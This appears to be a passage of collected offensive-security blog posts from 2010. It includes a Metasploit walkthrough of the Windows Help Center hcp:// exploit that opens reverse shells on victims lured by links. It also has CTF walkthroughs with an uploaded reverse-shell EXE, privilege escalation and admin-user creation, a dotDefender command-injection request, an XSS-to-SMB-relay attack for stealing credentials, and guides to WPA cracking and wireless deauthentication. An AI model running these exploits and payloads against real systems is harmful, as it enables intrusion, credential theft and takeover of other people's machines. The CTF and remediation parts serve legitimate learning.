access online documentation for Microsoft Windows. Microsoft
supports accessing help documents directly via URLs by installing a
protocol handler for the scheme "hcp". Due to an error in validation
of input to hcp:// combined with a local cross site scripting
vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. On IE6 and IE7 on XP
SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should
continue. Automatic detection of these options is implemented in
this module, and will default to not sending the exploit for
IE8/WMP11 unless the option is overridden."

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:5555
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.10:80/
[*] Server started.

Send Your Link to the Victim and wait:

Now send the victim out a link to your IP address via email or chat. Generally i would have a registered URL that looks friendly and send them that URL in order to not look too suspicious.

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for "/" does not contain a sub-directory, redirecting to /c3hfRM5Kh/ ...
[*] Sending Microsoft Help Center XSS and Command Execution to 192.168.1.11:1295...
[*] Responding to request for exploit iframe at 192.168.1.11:1295...
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from 192.168.1.11:1305
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.11:1305
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.11:1305
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.11:1305
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.10:5555 -> 192.168.1.11:1306) at Fri Jun 11 18:10:38 -0400 2010

msf exploit(ms10_xxx_helpctr_xss_ cmd_exec) > sessions -l

Active sessions
===============

Id Type         Information                      Connection
-- ----         -----------                      ----------
1   meterpreter EXPLOIT\Administrator @ EXPLOIT 192.168.1.10:5555 -> 192.168.1.11:1291

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: EXPLOIT\Administrator

Final Notes:

There you have it... This module sets up a server and waits for your victim to make a connection, when the victim does make a connection their help window is opened and they are silently owned.... More then likely the victim will just think windows is acting up as it usually does or they accidentally clicked something :) :) Maybe you should be using freebsd or slackware instead? You might still get owned but at least you will know its not the OS acting up hahahaha

Offensive Security Part 2 -- KilltheN00b Walk Through

2010-05-10T20:44:00.000-07:00

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro i was down for anouther challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page that stated there were 2 targets.

Killthen00b
Ghost

After a quick portscan I chose to attack killthen00b purely based on the amount of open ports available on the system. Ghost provided port HTTP only. KilltheN00b had various ports open including FTP, HTTP and some various mail ports.

Scan output:
21/tcp   open ftp
|_ftp-anon: Anonymous FTP login allowed
25/tcp   open smtp          Surgemail smtpd 3.8k4-4
80/tcp   open http          Surgemail webmail (DNews based)
|_html-title: SurgeMail Welcome Page
106/tcp open pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp open pop3          SurgeMail pop3d 3.8k4-4
143/tcp open imap          SurgeMail imapd 3.8k4-4
366/tcp open smtp          Surgemail smtpd 3.8k4-4
465/tcp open tcpwrapped
587/tcp open smtp          Surgemail smtpd 3.8k4-4
993/tcp open tcpwrapped
995/tcp open tcpwrapped
3389/tcp open ms-term-serv?
7025/tcp open tcpwrapped
7443/tcp open tcpwrapped

More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but its a good theory to cling to when things get rough

Initial FTP probing:

First thing i did was log into the FTP server with credentials that were provided on the offsec page. After logging into the FTP server there wasnt much to play with in any available directories so i decided to try to hop out of the FTP environment.

I tried to hop out of the ftp directory structure via directory traversal attacks with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail. So i decided to directly call the root directory with "cd c:".

Score

Cd C: correctly hopped me into a directory with loads of files available. I also seemed to be able to browse to a directory with system32 files. My actual first thought was to replace the system32 directory program Magnify.exe with my evil payload so that at the Remote desktop login the accessibility options would become a shell. But unfortunately I didnt have access to write to that directory so i moved on. After browsing files for awhile I decided this ftp session was a bust and logged out.

HTTP:

Next I decided to hit up the web page located on KilltheN00b. The webserver indicated an application by the name of "surgemail".

Also i noted the scripts directory on this site seemed to execute pages with a EXE extension. Very interesting...

I then checked the exploit databases and verified an exploit for the version of surgemail running that was valid for windows 2000 and 2003.

Debugging:

Next I decided to check the remote desktop port to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work. This was a

TOTAL FAIL

I loaded up the debugger and started modifying the exploit and realized that I was unable to control EIP after a bit of wrestling with the exploits located on exploitDB... Either due to my lack of advanced level exploitation or the differences in operating systems or its protection mechanisms i only had control of certain parts of the stack but no EIP overwrite. To be correct, rather partial overwrite of EIP in this exploit which utilized the OS already providing a zero byte on the first byte of the 4 byte EIP to bypass filters on insertion the overflow utilized what was already present, (I like that) otherwise our null stop execution of the program prematurely.

Before going further with this I realized this exploit was a post authentication exploit and would need a user account. grrrr

More Web:

I browsed around the the surgemail pages for awhile trying attacks against authentication and authorization without much success till i hit a /domainadmin management page. On this page i was able to guess a password of test/test using burp "comparer" to compare my responses and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords "poppassd" located on port 106. The found login worked,

Woot i could now use that exploit if i can get the exploit to work.. however this was still a fail after messing with it for a few hours.

Back to FTP:

After noticing the EXE files with a possible execution on the webpage i decided to hit the FTP session back up and see if I can get to the scripts directory. After messing around for awhile I realized that the "cd ..\..\" actually was working and after a few iterations got me to the root directory. I browsed to the surgemail/scripts directory

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users              0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users              0 May 03 22:51 Python26
dr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users              0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users              0 May 07 23:48 Users
dr-xrwx--- 1 admin users              0 May 03 21:28 Windows
-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users             10 Jun 10 2009 config.sys
-r--rr---- 1 admin users     2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point i got pretty excited and went into explotation mode.

Meterpreter Evil.exe:

I now i needed an evil EXE file to have the webserver serve up for me on behalf of the killtheN00b host. So i popped open metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.142 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.6.142,LPORT=4444

Now we have our test shell to try, which I then uploaded to the ftp server in the surgemail/scripts directory this directory also contained other exe files such as webmail.exe

Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!! Very important that all the bases are covered in information security..

Offensive Security in depth!!! or something like that.. (Wishful thinking)

So i started a multihandler for metasploit first, just in case the reverseshell worked.

msf > use multi/handler
msf exploit(handler) > set LHOST 192.168.6.142
LHOST => 192.168.6.142
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.142:4444
[*] Starting the payload handler...

I then proceded to browse to the directory with all bodyparts crossed.....Hoping for connect back

SCORE!!!!!

My connection status in metasploit then indicated i had an open session. :)

Post Explotation:

With a shiny shell in hand I first dropped the hashes via meterpreter hashdump but i noticed from the sequence of charactors the LM hashes were blank. So I decided to just create my own user using the following scenerio.

Get higher privilages:

meterpreter > getsystem
...got system (via technique 1).

Add a new domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host 127.0.0.1
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host 127.0.0.1
[+] Successfully added user to local group

But i like GUI's so lets get remote desktop, and I noted in an earlier attempt to log into window with my ftp credentials that i needed to be part of the remote desktop users group.. so lets be part of the cool kids group shall we??

Get a Remote Desktop Gui:

meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host 127.0.0.1
[+] Successfully added user to local group

SCORE I can now login with domain admin on a pretty gui interface provided by microsoft.. Thanks microsoft :) and thanks metaploit.

After logging into the windows7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total. Job well done...Thanks to steponequit and carnalownage and sygog for calaborating on attack possibilities, sometimes multiple minds work better even if its not the solution possibilities for the future arise

Lessons Learned:

-Dont listen to other peoples chatter and take it as truth.While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though i veered off the path for awhile listening to people in the IRC chat about payloads.
-Also again always trying things twice and CONFIRM.... Initially i thought i didn't have the traversal. it turns out i did 3 hours before I used it!

Remediation:

-Check the ACL's and the Jails on your FTP servers and make sure they are not traverseable.
-Review your applications for any known exploitable 3rd party software and update
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers machines

Get a HUGE security budget and hire me to run all your penetration tests for twice your average cost!!! Preferably from the beach externally :) Dont forget to add redbull and sourpatch kids to the budget!!! They are ESSENTIAL to my findings.

Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG) nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..

Up next: Part 3

Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!!

Offensive Security n00bFilter Walk Through

2010-05-10T18:17:00.000-07:00

How Strong is Your FU hacker challenge

Target 1: N00bFilter

The first target in this weekend’s offensive security challenge was nicknamed n00bfilter as it was used to weed out all the n00bs who would plague the internal Offsec networks with high bandwidth unnecessary tools such as Nessus or Webinspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in exploitation of this CTF challenge. Your BRAIN is the only valid tool in an offsec challenge. At first glance n00bfilter appears to be a login and password prompt to an application with no other available options but username and password. Source looks pretty standard as well.. Nothing special, no JavaScript or includes to be had.

First Clue: Error Message

Like most pentests your first inclination would be to post a single quote or random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected sql error or perhaps invalid character. Upon further inspection of the error pages source code it was noted that this was an Applicure error message. Applicure being the vendor of Dot Defender a well known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an ids/ips product and started performing further probing of the application.

Annoyance: cool out periods

I then started trying default user/pass combinations such as admin/admin admin/password. Anything that a normal administrator would FAIL to implement changes to. This led me nowhere quickly at which time I started losing my connection to the application. After roughly 5minutes i was back online and figured my internet connection was foobarred... Got to love sketchy cable connections right?? I swear they do bandwidth limiting but whatever.. LOL A few minutes later I was blocked again, and again, and again.... Apparently Dot Defender was set to "Cool me down” when I got out of control.... Very NOT COOL..... This annoyed me becuase I was manually probing the application. This application also appeared to vary its cool outs based on what you were doing, messing with the URL, messing with the input fields, certain characters, some may be ok others blocked you immediately, then sometimes after a few tries... Interesting the application has a personality apparently.

Thought: Dot Defender bypass

When I started getting owned by dot defender over and over again I started to think maybe I have to shut the WAF down or at least add my IP address to a list of friends within the dot defenders configurations. But how??
I immediately started researching dot defender weaknesses and vulnerabilities on my good friend Google and this was found...

Full Disclosure:

http://seclists.org/fulldisclosure/2009/Nov/357
The above link states that Post Authentication there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm “post authentication”. This means I need credentials, bullocks!! I don't have credentials

Ok back to google, the google gods then provided me with a few tidbits of information regarding Dot Defender, one useful piece of information being that DotDefender site manager was located a /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name the struggle is half over right? so i tried all the default password combos and a few random passwords based on the site and the challenge.

FAIL

Dont Second Guess yourself:

Figuring that a vulnerability on full disclosure was not going to be the issue and especially being post auth on a n00bFilter I moved back to probing the app... I went at it for awhile with combination's of character encodings and character assembly that might fool the WAF into either letting my attacks through the firewall or removing just enough of the attack to reassemble the attack for me.. Attacks such as <scr><script>ipt> or other combination's using various
encoding techniques...

Again FAIL!!

Social Networking:

So I remember the hints said to stay in touch via twitter and IRC. I pop up the IRC channel and its a bunch of whiners complaining about a password being changed.. I was just thinking “WHAT PASSWORD”. I felt out of the loop at that point but I know better then to ask Muts a direct question, I already know the answer.. “TRY HARDER” this is offensive securities mantra which answers every inquiry. So instead I got some redbull and thought it over for a few and noticed that the IRC channel said the passwords were now reset to the original values.

Dot Defender again:

Knowing that the only password not behind dot defenders tyrannical rule was the basic auth login for dot defender, i decided gave Dot Defender a second go. The very first combination I tried popped open the application with the password of “password” and a # symbol at the end of the index page value, someone had suggested I try the # earlier.

Apparently the first few people past the login started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post authentication exploitation from full disclosure.. :)

Post Auth:

Opening up Burp Proxy a well known application proxy I started browsing the Dot Defender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in burp by the name of “repeater”, repeater allows you to keep making the request over and over again manually manipulating the values. Since I had an example delete request and I had the delete example on the full disclosure vulnerability, I modified my request with the vulnerable values.

POST /dotDefender/index.cgi HTTP/1.1
Host: www1.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www1.noob-filter.com/dotDefender/index.cgi
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

sitename=testsite&deletesitename=testsite;id;ls -al;pwd;&action=deletesite&linenum=12

In the web response was the output of my command injection. I injected an “ls” command which in unix lists the contents of a directory. I thought to myself, ok so that’s cool but I need to find a certain file to show that I passed the challenge. Running burp requests looking for this file is waaaaay to tedious for me. So I used another familiar unix command. The “find” command.

sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12

Score:

The n00bSecret file was found quickly so I used the “cat” command to list out the contents of the file with the proof of passing the first challenge.

Request:

sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12

Response:

9f9b0b7d2db411c10b517b547a8693d831d3aa936aba4d54b51d30b5a182c05b1f7a5759fd7d5ef64e5485e5d3e3a214dd6b4b78a733566556b2887a6b9a6299

I browsed out to the contest scoreboard page and added in my shiny new proof key imediatly since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted 25 points added to my account and a shiny new VPN login will be provided to me within 5 minutes time!!!

Mexican food:

At this point I decided it was time for some Mexican food, I was fiendish for some chips and salsa all day long. I passed the n00b challenge being the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled till 24 hours after this point.. :) Not too horrible but again could be much better!!

Lessons Learned:

Dont second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and what you are presented with and try things more than once! They just might work the second time... At this point 5 hours of the competition were wasted on something that should have taken me less than 2 hours. Or even 30 min if I was quick with it.

Dot Defender Remediation:

There is a patch available for this vulnerability from Applicure, just patch your app!! Also according to this other post by Applicure it only effects Linux running Apache. Response by Applicure in the link below.
http://seclists.org/bugtraq/2009/Dec/123

Next up, how to own killthen00b

Combining XSS and SMB-Relay

2010-04-15T20:00:00.000-07:00

I found this to be an interesting way to make XSS useful in say an internal pentest on a local application, or perhaps on a client side test via emails to users you enumerated google hacking or through maltego. You can simply use XSS to call a non existent share on a host running a listener and force a windows user issue their hashes to your listener and gain a shell.

Setting up SMB_Relay in Metasploit:
Open up a metasploit session:

root@ficti0n:~# /pentest/exploits/framework3/msfconsole

=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 490 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
=[ svn r8091 updated 6 days ago (2010.01.09)

msf > use exploits/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > set LHOST 172.20.200.118 <-- Whatever this metasploit server is
LHOST => 172.20.200.118
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started reverse handler on port 4444
[*] Server started.

XSS your Client:
Once your listener is setup on your backtrack server running metasploit you can then run your cross-site-scripting attack against the Client. This attack can be accomplished with the following script string which tries to open a share on the attack server. Put the string below into any parameter that is vulnerable to cross site scripting, just change the IP address to the ipaddress of your server which is running the metasploit smb_relay listener.

When the XSS link is clicked you will see network hashes race across the output of the metasploit console. Basically the client that is being XSS'd is sending over their windows credentials to try to open a network share. Metasploit at this point is passing the hashes back to the client and opening a meterpreter session gaining shell access. This is how its working as I understand the process.

[*] Authenticating to 172.20.200.125 as Ficti0n-1C10DB\Administrator...
[*] AUTHENTICATED as Ficti0n-1C10DB\Administrator...
[*] Ignoring request from 172.20.200.125, attack already in progress.
[*] Sending Access Denied to 172.20.200.125:1069 Ficti0n-1C10DB\Administrator
[*] Received 172.20.200.125:1071 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 Service Pack 2 LM:
[*] Sending Access Denied to 172.20.200.125:1071 \
[*] Received 172.20.200.125:1071 Ficti0n-1C10DB\Administrator LMHASH:ff227wf24924844095c91577w265de85ebb20w9e9f146319 NTHASH:ff227df2492d844095c91577w265de85ebb20b9w4f178319 OS:Windows Server 2003 3790 Service Pack 2 LM:
[*] Authenticating to 172.20.200.125 as Ficti0n-1C10DB\Administrator...
[*] AUTHENTICATED as Ficti0n-1C10DB\Administrator...
[*] Ignoring request from 172.20.200.125, attack already in progress.
[*] Sending Access Denied to 172.20.200.125:1071 Ficti0n-1C10DB\Administrator

At this point you can click into the Metasploit window and issue the following commands to take control of the client machine.

msf exploit(smb_relay) > sessions -l

Active sessions
===============
Id Description Tunnel
1 Meterpreter 172.20.200.118:4444 -> 172.20.200.125:1047

msf exploit(smb_relay) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

You are now logged into the Clients machine as system and can perform any actions that you wish under the context of a System account. Create users, dump hashes, and use the system as a jump point into other systems on the local network. This is all pretty simple stuff but I thought it was pretty cool to just issue it from an XSS attack since I dont see good XSS examples to often. usually just how to grab a cookie.

Combining this with CFS:
Other good ideas for this attack would be to embed this into a header of a site you control via a cross frame scripting attack. You can then encapsulate a whole valid page in an iframe and the user will never know unless they look at the url... however you can always just register a similar URL to trick a user while silently be passing their credentials...

Prevention:
Of course egress filtering of outgoing ports will prevent this attack.. most people do not egress filter however.

Airolib-ng WPA cracking walk through

2010-02-19T12:03:00.000-08:00

I use to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases with lists of SSID’s and Passwords. Airolib will create these databases with SQLite3. This is convenient because you can have more than one SSID and Password list in each database. If you are in an area with multiple SSID’s running WPA you can note all of the SSID’s in a list and import them into the database. This is great because when doing a packet capture in an environment with multiple WPA encrypted networks, the attacker can crack any of the 4way Authentication Handshakes with the same database file. Below is a play by play of cracking a WPA wireless network using the airolib/aircrack method.

Note: I assume you already have a packet capture of a handshake.... If not just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel. I also assume you know the old way of cracking wpa.. If not I can post a guide on how to do that...

Setting up the databases:

First you need to create a SQLite3 database and import some SSID’s to the new database. If no database is already created then Airolib will create one for you automatically. Create a list of SSID’s from your Airodump output. Then use the Airolib command in the following format.

Airolib-ng --import essid

Create SSID list:

Example:

root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt

Database does not already exist, creating it...

Database sucessfully created

Reading file...

Writing...

Done.

Next import your password list into the same database with the same format as when you added SSID’s to the database but replacing the keyword to passwd and adding your password list. Here is the format for this followed by an example.

Airolib-ng --import

Create Password List:

Example:

root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt

Reading file...

Writing...

Done.

This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.

Clean Database:

Example:

root@ ficti0n:~# airolib-ng wpaDatabase --clean all

Deleting invalid ESSIDs and passwords...

Deleting unreferenced PMKs...

Analysing index structure...

Vacuum-cleaning the database. This could take a while...

Checking database integrity...

integrity_check

Query done. 2 rows affected.

Done.

Create your PMK’s:

After you have imported all your SSID’s and Passwords you can create PMK hashes with the following command.

root@ ficti0n:~# airolib-ng wpaDatabase --batch

Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Cracking:

Now that you have databases of PMK hashes for the WPA SSID’s in your area you can run a crack against your Output cap file to retrieve your password. If all goes well and the networks password is in your database you are done.

Example:

root@ ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap

Opening Output-02.cap

Read 3347 packets.

# BSSID ESSID Encryption

1 00:18:F8:66:7E:CC ficti0nAP WPA (1 handshake)

Choosing first network as target.

Opening Output-02.cap

Aircrack-ng 1.0 r1645

[00:00:00] 1 keys tested (240.91 k/s)

KEY FOUND! [ MyPassword ]

Master Key : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80

67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60

Transient Key : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0

FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3

00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9

1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67

EAPOL HMAC : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0

Quitting aircrack-ng...

Optional:

Another useful option if you want to crack all the WPA networks but you want to set the priority on a specific network you can run this sql command to set that priority in the database. Try the following command to set your network as a priority.

root@ficti0n:~# airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'

Query done. 1 rows affected.

Airdrop-ng Basics on BT4 Final

2010-02-15T21:32:00.000-08:00

De-Authentication and Client Manipulation

Over the last few days I have been playing with Airdrop-NG, it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related and it seemed to be more consistently working after installing psyco. Below are my notes on using Airdrop-ng and also the information from schmoocon 2010. This tool should to be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.

Description:
Airdrop-NG is a wireless de-authentication tool released at schmoocon 2010 which can also double as a poor man's WIPS depending on your intentions. Airdrop-NG is a rule based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using Client Stations MAC's, BSSID's and a few other descriptors. Rules can be updated while the program is running in a loop making for easy on the fly changes within your attack. On each loop Airdrop-NG reparse’s the rules file and continues sending packets based on a CSV output from Airodump-ng.

Below will be a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against his BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final. Pre Final however did give me problems.

Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python install.py

Checking for dependancies used by the installer...
All dependancies installed! Continuing...

#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!

Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.

Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed! =)
Would you like to install lorcon? (y/n): y
Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may tak
e a while...
A    lorcon-old/rt2500inject.h
A    lorcon-old/lorcon_decode.c
A    lorcon-old/lorcon_packasm.h
A    lorcon-old/tx80211_errno.h
A    lorcon-old/Makefile.in
A    lorcon-old/rt73inject.h
A    lorcon-old/madwifing_control.c
..........................
.................................................
copying build/lib.linux-i686-2.5/pylorcon.so -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)

Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
python-psyco
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...

Setup Wireless Interface:
root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
5757    dhclient3
Interface       Chipset         Driver
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

Switch to another shell and run airodump: (leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0

CH 6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
BSSID              PWR Beacons    #Data, #/s CH MB   ENC CIPHER AUTH ESSID
02:5B:6B:4E:6C:6F   -1       26        1    0 11 54 . WEP WEP         Testing
02:1F:28:65:AE:ED -24      489      391    0   1 54e WPA2 CCMP   PSK ficti0nsAP
00:0B:85:6C:2D:4F -71       48        0    0   1 54 . WEP WEP         Linksys
00:1B:85:6E:2D:4D -72       48        0    0   1 54 . WEP WEP
06:0B:85:6C:7D:4E -71       45        0    0   1 54 . OPN

BSSID              STATION            PWR   Rate    Lost Packets Probes
(not associated)   02:16:08:AD:6E:95 -67    0 - 1      0        3
(not associated)   00:A0:F8:B8:DF:69 -73    0 - 1    120       39 Linksys
(not associated)   00:24:36:74:F1:97 -53    0 - 1      0       57
02:0B:65:4E:6C:62 02:17:6B:20:00:ED -72    0 - 1    124       27
02:1F:28:65:AE:ED 00:23:4E:DF:AE:70    0   54e- 1e   979      444
02:1F:28:65:AE:ED 00:21:00:DB:60:00 -28    0 - 1     67       91 ficti0nsAP
02:1F:28:65:AE:ED 00:21:6A:11:0E:52 -38    1e- 2e     0      212 ficti0nsAP
02:1F:28:65:AE:ED 00:2E:45:9F:87:AC -38    1e- 6e     0      194 ficti0nsAP
02:1F:28:65:AE:ED 00:23:3E:DF:ED:ED -42   54e- 1      0       63 ficti0nsAP
02:1F:28:65:AE:ED 00:25:08:AD:50:7C -51   54e-24      0        2
02:1F:28:65:AE:ED 00:1E:C2:C4:E5:79 -67    1e- 1      0       94 ficti0nsAP

Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients, I will explain a bit about the rules form the schmooo presentation then we will add a rule to our rules.conf.

Rules are broken down into 3 fields: (Action/ap|clients):

2 options for state field:
-Allow
-Deny

5 options for AP field:
-ESSID
-BSSID
-Company OUI name value
